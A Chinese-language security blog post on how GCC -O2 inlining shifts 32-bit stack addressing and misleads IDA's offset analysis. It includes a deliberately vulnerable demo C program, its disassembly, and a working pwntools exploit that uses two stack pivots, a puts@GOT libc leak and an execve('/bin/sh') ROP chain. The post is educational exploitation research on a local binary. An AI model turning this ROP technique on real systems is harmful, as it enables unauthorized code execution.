<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="O-Pwn 最近一个朋友和我在研究为什么有些时候IDA偏移分析失误时发现当程序ebp寻址改成了esp寻址有可能会导致IDA的偏移出现失误，那么编译参数有可能就加上了O参数 GCC 编译器的 -O 参数用于控制代码优化的级别，不同的优化级别会影响程序的执行效率、编译时间和生成的可执行文件大小 加上了-O参数后会导致原本的ebp寻址变成了esp寻址，IDA偏移分析失误这种情况通常出现在memcpy()">
<meta property="og:type" content="article">
<meta property="og:title" content="O-Pwn">
<meta property="og:url" content="http://example.com/2025/05/07/O-Pwn/index/index.html">
<meta property="og:site_name" content="PuH4ck3rX&#39;s Blog">
<meta property="og:description" content="O-Pwn 最近一个朋友和我在研究为什么有些时候IDA偏移分析失误时发现当程序ebp寻址改成了esp寻址有可能会导致IDA的偏移出现失误，那么编译参数有可能就加上了O参数 GCC 编译器的 -O 参数用于控制代码优化的级别，不同的优化级别会影响程序的执行效率、编译时间和生成的可执行文件大小 加上了-O参数后会导致原本的ebp寻址变成了esp寻址，IDA偏移分析失误这种情况通常出现在memcpy()">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2025-05-07T10:51:04.000Z">
<meta property="article:modified_time" content="2025-05-07T11:21:16.404Z">
<meta property="article:author" content="PuH4ck3rX">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>O-Pwn</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">h0m3</a></li><!--
     --><!--
       --><li><a href="/about/">ab0ut</a></li><!--
     --><!--
       --><li><a href="/archives/">art1cl3s</a></li><!--
     --><!--
       --><li><a href="/links/">l1nks</a></li><!--
     --><!--
       --><li><a href="/search/">s3arch</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Next post" href="/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2025/05/07/O-Pwn/index/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2025/05/07/O-Pwn/index/&text=O-Pwn"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2025/05/07/O-Pwn/index/&title=O-Pwn"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2025/05/07/O-Pwn/index/&is_video=false&description=O-Pwn"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=O-Pwn&body=Check out this article: http://example.com/2025/05/07/O-Pwn/index/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2025/05/07/O-Pwn/index/&title=O-Pwn"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2025/05/07/O-Pwn/index/&title=O-Pwn"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2025/05/07/O-Pwn/index/&title=O-Pwn"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2025/05/07/O-Pwn/index/&title=O-Pwn"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2025/05/07/O-Pwn/index/&name=O-Pwn&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2025/05/07/O-Pwn/index/&t=O-Pwn"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        O-Pwn
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">PuH4ck3rX</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-05-07T10:51:04.000Z" class="dt-published" itemprop="datePublished">2025-05-07</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p>O-Pwn</p>
<p>最近一个朋友和我在研究为什么有些时候IDA偏移分析失误时发现当程序ebp寻址改成了esp寻址有可能会导致IDA的偏移出现失误，那么编译参数有可能就加上了O参数</p>
<p>GCC 编译器的 <code>-O</code> 参数用于控制代码优化的级别，不同的优化级别会影响程序的执行效率、编译时间和生成的可执行文件大小</p>
<p>加上了-O参数后会导致原本的ebp寻址变成了esp寻址，IDA偏移分析失误这种情况通常出现在memcpy()复制函数溢出中</p>
<p>直接简单的溢出即使ebp寻址改成了esp寻址 IDA仍然偏移分析正确，但是随着O的参数的增加优化级别也更高，在O2的情况下</p>
<p>一些简短的存在漏洞的函数会被直接放在main函数中，编译器并不会为其开辟新的栈帧，如以下的demo</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">#include &lt;stdio.h&gt;</span><br><span class="line">#include &lt;string.h&gt;</span><br><span class="line"></span><br><span class="line">static char src[0x500];</span><br><span class="line"></span><br><span class="line">#pragma GCC optimize(&quot;-fno-stack-protector&quot;)</span><br><span class="line"></span><br><span class="line">void load()&#123;</span><br><span class="line">    setvbuf(stdout, 0, 2, 0);</span><br><span class="line">    setvbuf(stdin, 0, 1, 0);</span><br><span class="line">&#125;</span><br><span class="line">void vuln()&#123;</span><br><span class="line">    char buffer[64];</span><br><span class="line">    read(0,buffer,0x48);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">int main() &#123;</span><br><span class="line">    </span><br><span class="line">    load();</span><br><span class="line"></span><br><span class="line">    printf(&quot;pwn me!\n&quot;);</span><br><span class="line">    read(0,src,0x490);</span><br><span class="line"></span><br><span class="line">    printf(&quot;let&#x27;s overflow,but you seem can&#x27;t cover the ret_addr\n&quot;);</span><br><span class="line">    vuln();</span><br><span class="line">    </span><br><span class="line">    printf(&quot;Hack for Fan\n&quot;);</span><br><span class="line">    </span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>下面是编译参数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gcc demo.c -o demo0 -g -m32 -O2</span><br></pre></td></tr></table></figure>

<p>下面是IDA逆向出的代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">int __cdecl main(int argc, const char **argv, const char **envp)</span><br><span class="line">&#123;</span><br><span class="line">  _BYTE buf[68]; // [esp+0h] [ebp-48h] BYREF</span><br><span class="line"></span><br><span class="line">  load();</span><br><span class="line">  puts(&quot;pwn me!&quot;);</span><br><span class="line">  read(0, src, 0x490u);</span><br><span class="line">  puts(&quot;let&#x27;s overflow,but you seem can&#x27;t cover the ret_addr&quot;);</span><br><span class="line">  read(0, buf, 0x48u);</span><br><span class="line">  puts(&quot;Hack for Fan&quot;);</span><br><span class="line">  return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以发现原本的vuln函数里的代码直接被放到main函数里了，这时就不能直接溢出了，因为通过调式发现以下汇编代码(以下情况仅32位会出现)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">► 0x804841f &lt;main+95&gt;     mov    ecx, dword ptr [ebp - 4]</span><br><span class="line">  0x8048422 &lt;main+98&gt;     add    esp, 0x10</span><br><span class="line">  0x8048425 &lt;main+101&gt;    xor    eax, eax</span><br><span class="line">  0x8048427 &lt;main+103&gt;    leave</span><br><span class="line">  0x8048428 &lt;main+104&gt;    lea    esp, [ecx - 4]</span><br><span class="line">  0x804842b &lt;main+107&gt;    ret</span><br></pre></td></tr></table></figure>

<p>那么这种情况的话就只能通过2次栈迁移来进行rop了</p>
<p>下面是exp</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"></span><br><span class="line">context(arch=&#x27;i386&#x27;, os=&#x27;linux&#x27;,log_level=&#x27;debug&#x27;)</span><br><span class="line">#context.terminal = [&quot;tmux&quot;, &quot;splitw&quot;, &quot;-h&quot;]</span><br><span class="line"></span><br><span class="line">elf = ELF(&#x27;./demo0&#x27;)</span><br><span class="line">libc = ELF(&#x27;./libc.so.6&#x27;)</span><br><span class="line">sh = process(&#x27;./demo0&#x27;)</span><br><span class="line">#gdb.attach(sh, &#x27;b *0x8048413\nc&#x27;)</span><br><span class="line">pop_ebx = 0x08048359</span><br><span class="line">pop_3 = 0x080485b9</span><br><span class="line">pop_esp = 0x08048557</span><br><span class="line">src_addr = 0x0804A060</span><br><span class="line">base_stage = 0x200</span><br><span class="line">bss_addr = src_addr + base_stage</span><br><span class="line">pivot_addr = bss_addr + 0x4</span><br><span class="line"></span><br><span class="line">payload = cyclic(base_stage) + p32(elf.symbols[&#x27;puts&#x27;]) + p32(pop_ebx) + p32(elf.got[&#x27;puts&#x27;])</span><br><span class="line">payload += p32(elf.symbols[&#x27;read&#x27;]) + p32(pop_3) + p32(0) + p32(bss_addr - 0x100) + p32(0x40) + p32(pop_esp) + p32(bss_addr - 0x100)</span><br><span class="line">sh.sendafter(&#x27;pwn me!\n&#x27;, payload)</span><br><span class="line"></span><br><span class="line">payload = cyclic(0x44) + p32(pivot_addr)</span><br><span class="line">sh.sendafter(&#x27;ret_addr\n&#x27;, payload)</span><br><span class="line"></span><br><span class="line">puts_got = u32(sh.recvuntil(&#x27;\xf7&#x27;)[-4:])</span><br><span class="line">success(hex(puts_got))</span><br><span class="line">libc.address = puts_got - libc.symbols[&#x27;puts&#x27;]</span><br><span class="line"></span><br><span class="line">payload = p32(libc.symbols[&#x27;execve&#x27;]) + p32(pop_3) + p32(next(libc.search(&#x27;/bin/sh\x00&#x27;))) + p32(0) + p32(0) + p32(0xdeadbeef)</span><br><span class="line">sh.send(payload)</span><br><span class="line"></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>


  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">h0m3</a></li>
        
          <li><a href="/about/">ab0ut</a></li>
        
          <li><a href="/archives/">art1cl3s</a></li>
        
          <li><a href="/links/">l1nks</a></li>
        
          <li><a href="/search/">s3arch</a></li>
        
      </ul>
    </div>

    
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2025/05/07/O-Pwn/index/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2025/05/07/O-Pwn/index/&text=O-Pwn"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2025/05/07/O-Pwn/index/&title=O-Pwn"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2025/05/07/O-Pwn/index/&is_video=false&description=O-Pwn"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=O-Pwn&body=Check out this article: http://example.com/2025/05/07/O-Pwn/index/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2025/05/07/O-Pwn/index/&title=O-Pwn"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2025/05/07/O-Pwn/index/&title=O-Pwn"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2025/05/07/O-Pwn/index/&title=O-Pwn"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2025/05/07/O-Pwn/index/&title=O-Pwn"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2025/05/07/O-Pwn/index/&name=O-Pwn&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2025/05/07/O-Pwn/index/&t=O-Pwn"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
      <div class="footer-left">
        Copyright &copy;
        
        
        2016-2025
        PuH4ck3rX
      </div>
      <div class="footer-right">
        <nav>
          <ul>
            <!--
          --><li><a href="/">h0m3</a></li><!--
        --><!--
          --><li><a href="/about/">ab0ut</a></li><!--
        --><!--
          --><li><a href="/archives/">art1cl3s</a></li><!--
        --><!--
          --><li><a href="/links/">l1nks</a></li><!--
        --><!--
          --><li><a href="/search/">s3arch</a></li><!--
        -->
          </ul>
          <ul>
            
              <!-- busuanzi统计 -->
              <span id="busuanzi_container_site_pv">
                  本站总访问量<span id="busuanzi_value_site_pv"></span>次
              </span>
              <span class="post-meta-divider">|</span>
              <span id="busuanzi_container_site_uv" style='display:none'>
                      本站访客数<span id="busuanzi_value_site_uv"></span>人
              </span>
            <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            
          </ul>
        </nav>
      </div>
      
</footer>


    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'SITENAME';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>

<!-- utterances Comments -->

</body>
</html>
